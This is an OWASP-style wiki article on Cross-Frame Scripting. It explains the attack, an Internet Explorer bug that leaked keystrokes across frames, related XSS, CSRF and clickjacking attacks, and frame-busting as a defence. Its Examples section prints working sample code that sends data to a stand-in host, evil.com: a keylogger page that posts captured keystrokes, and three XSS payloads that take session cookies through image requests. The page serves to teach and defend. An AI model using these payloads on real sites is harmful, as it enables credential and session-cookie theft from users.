---

layout: col-sidebar
title: Cross Frame Scripting
author: 
contributors: 
permalink: /attacks/Cross_Frame_Scripting
tags: attack, Cross Frame Scripting
auto-migrated: 1

---

{% include writers.html %}

## Description

Cross-Frame Scripting (XFS) is an attack that combines malicious
JavaScript with an iframe that loads a legitimate page in an effort to
steal data from an unsuspecting user. This attack is usually only
successful when combined with social engineering. An example would
consist of an attacker convincing the user to navigate to a web page the
attacker controls. The attacker's page then loads malicious JavaScript
and an HTML iframe pointing to a legitimate site. Once the user enters
credentials into the legitimate site within the iframe, the malicious
JavaScript steals the keystrokes.

## Risk Factors

The standard browser security model allows JavaScript from one web page
to access the content of other pages that have been loaded in different
browser windows or frames as long as those other pages have been loaded
from the same-origin server or domain. It does not allow access to pages
that have been loaded from different servers or domains (see MSDN
article [About Cross-Frame Scripting and
Security](http://msdn.microsoft.com/en-us/library/ms533028%28VS.85%29.aspx)).
However, specific bugs in this security model exist in specific
browsers, allowing an attacker to access some data in pages loaded from
different servers or domains. The most well-known such bug affects IE,
which leaks keyboard events across HTML framesets (see iDefense Labs
advisory [Microsoft Internet Explorer Cross Frame Scripting Restriction
Bypass](http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=77)).
This bug could allow, for example, an attacker to steal the login
credentials of a browser user as he or she tries to type them into the
login form of a third-party web page.

## Examples

### XFS Attack Against IE

To exploit the IE bug which leaks keyboard events across framesets, an
attacker may create a web page at evil.com, which the attacker controls,
and include on the evil.com page a visible frame displaying the login
page for example.com. The attacker can hide the frame's borders and
expand the frame to cover the entire page, so that it looks to the
browser user like he or she is actually visiting example.com The
attacker registers some javascript in the main evil.com page which
listens for all key events on the page. Normally, this listener would be
notified of events only from the main evil.com page -- but because of
the browser bug, this listener is notified also of events from the
framed example.com page. So every key press the browser user makes in
the example.com frame, while trying to log into example.com, can be
captured by the attacker, and reported back to evil.com:

    <!-- http://evil.com/example.com-login.html -->
    <head>
    <script>
    // array of user keystrokes
    var keystrokes = [];
    // event listener which captures user keystrokes
    document.onkeypress = function() {
        keystrokes.push(window.event.keyCode);
    }
    // function which reports keytrokes back to evil.com every second
    setInterval(function() {
        if (keystrokes.length) {
            var xhr = newXHR();
            xhr.open("POST", "http://evil.com/k");
            xhr.send(keystrokes.join("+"));
        }
        keystrokes = [];
    }, 1000);
    // function which creates an ajax request object
    function newXHR() {
        if (window.XMLHttpRequest)
            return new XMLHttpRequest();
        return new ActiveXObject("MSXML2.XMLHTTP.3.0");
    }
    </script>
    </head>
    <!-- re-focusing to this frameset tricks browser into leaking events -->
    <frameset onload="this.focus()" onblur="this.focus()">
    <!-- frame which embeds example.com login page -->
    <frame src="http://example.com/login.html">
    </frameset>

### XSS Attack Using Frames

To exploit a [Cross Site Scripting
Flaw](Cross_Site_Scripting_Flaw "wikilink") on a third-party web page at
example.com, the attacker could create a web page at evil.com, which the
attacker controls, and include a hidden iframe in the evil.com page. The
iframe loads the flawed example.com page, and injects some script into
it through the XSS flaw. In this example, the example.com page prints
the value of the "q" query parameter from the page's URL in the page's
content without escaping the value. This allows the attacker to inject
some javascript into the example.com page which steals the
browser-user's example.com cookie, and sends the cookie via a fake-image
request to evil.com (the iframe's src URL is wrapped for legibility):

    <iframe style="position:absolute;top:-9999px" src="http://example.com/↵
        flawed-page.html?q=<script>document.write('<img src=\"http://evil.com/↵
        ?c='+encodeURIComponent(document.cookie)+'\">')</script>"></iframe>

The iframe is hidden off-screen, so the browser user won't have any idea
that he or she just "visited" the example.com page. However, this attack
is effectively the same as a conventional XSS attack, since the attacker
could have simply redirected the user directly to the example.com page,
using a variety of methods, including a meta element like this (again,
the meta element's URL is wrapped for legibility):

    <meta http-eqiv="refresh" content="1;url=http://example.com/↵
        flawed-page.html?q=<script>document.write('<img src=\"http://evil.com/↵
        ?c='+encodeURIComponent(document.cookie)+'\">')</script>">

The only difference is that when using an iframe, the attacker can hide
the frame off-screen -- so the browser user won't have any idea that he
or she just "visited" example.com. When using a redirect to navigate
directly to example.com, the browser will display the example.com url in
the browser's address bar, and the example.com page in the browser's
window, so the browser user will be aware that he or she is visiting
example.com.

### Another XSS Attack Using Frames

To exploit the same [Cross Site Scripting
Flaw](Cross_Site_Scripting_Flaw "wikilink") as above at example.com
(which prints the value of the "q" query parameter from the page's URL
in the page's content without escaping the value) the attacker could
create a web page at evil.com, which the attacker controls, that
includes a link like the following, and induce the user to click on the
link. This link injects an iframe into the example.com page by
exploiting the XSS flaw with the "q" query parameter; the iframe runs
some javascript to steal the browser-user's example.com cookie, and
sends it via a fake-image request to evil.com (the URL is wrapped for
legibility):

    http://example.com/flawed-page.html?=<iframe src="↵
        javascript:document.body.innerHTML=+'<img src=\"http://evil.com/↵
        ?c='+encodeURIComponent(document.cookie)+'\">'"></iframe>

Again, this attack is effectively the same as a conventional XSS attack;
the attacker simply uses the src attribute of the injected iframe
element as a vehicle to run some javascript code in the attacked page.

## Related Threat Agents

  - An XFS attack generally is carried out by a malicious
    [:Category:Internet
    attacker](:Category:Internet_attacker "wikilink").
  - An XFS attack exploiting a browser bug which leaks events across
    frames is similar to an attack which uses conventional key-logging
    software.

## Related Attacks

  - An attacker might use a hidden frame to carry out a [Cross-site
    Scripting (XSS)](xss) attack.
  - An attacker might use a hidden frame to carry out a [Cross-Site
    Request Forgery
    (CSRF)](Cross-Site_Request_Forgery_\(CSRF\) "wikilink") attack.
  - An attacker might use a visible frame to carry out a
    [Clickjacking](Clickjacking "wikilink") attack.
  - An XFS attack exploiting a browser bug which leaks events across
    frames is a form of a [Phishing](Phishing "wikilink") attack (the
    attacker lures the user into typing-in sensitive information into a
    frame containing a legitimate third-party page).

## Related Vulnerabilities

  - XFS attacks exploit specific browser bugs.

## Related Controls

  - XFS attacks may denied by preventing the third-party web page from
    being framed; the techniques used to do this are the same as those
    used for [Clickjacking Protection for Java
    EE](Clickjacking_Protection_for_Java_EE "wikilink").

## References

  - MSDN article [About Cross-Frame Scripting and
    Security](http://msdn.microsoft.com/en-us/library/ms533028%28VS.85%29.aspx)
  - iDefense Labs advisory [Microsoft Internet Explorer Cross Frame
    Scripting Restriction
    Bypass](http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=77)
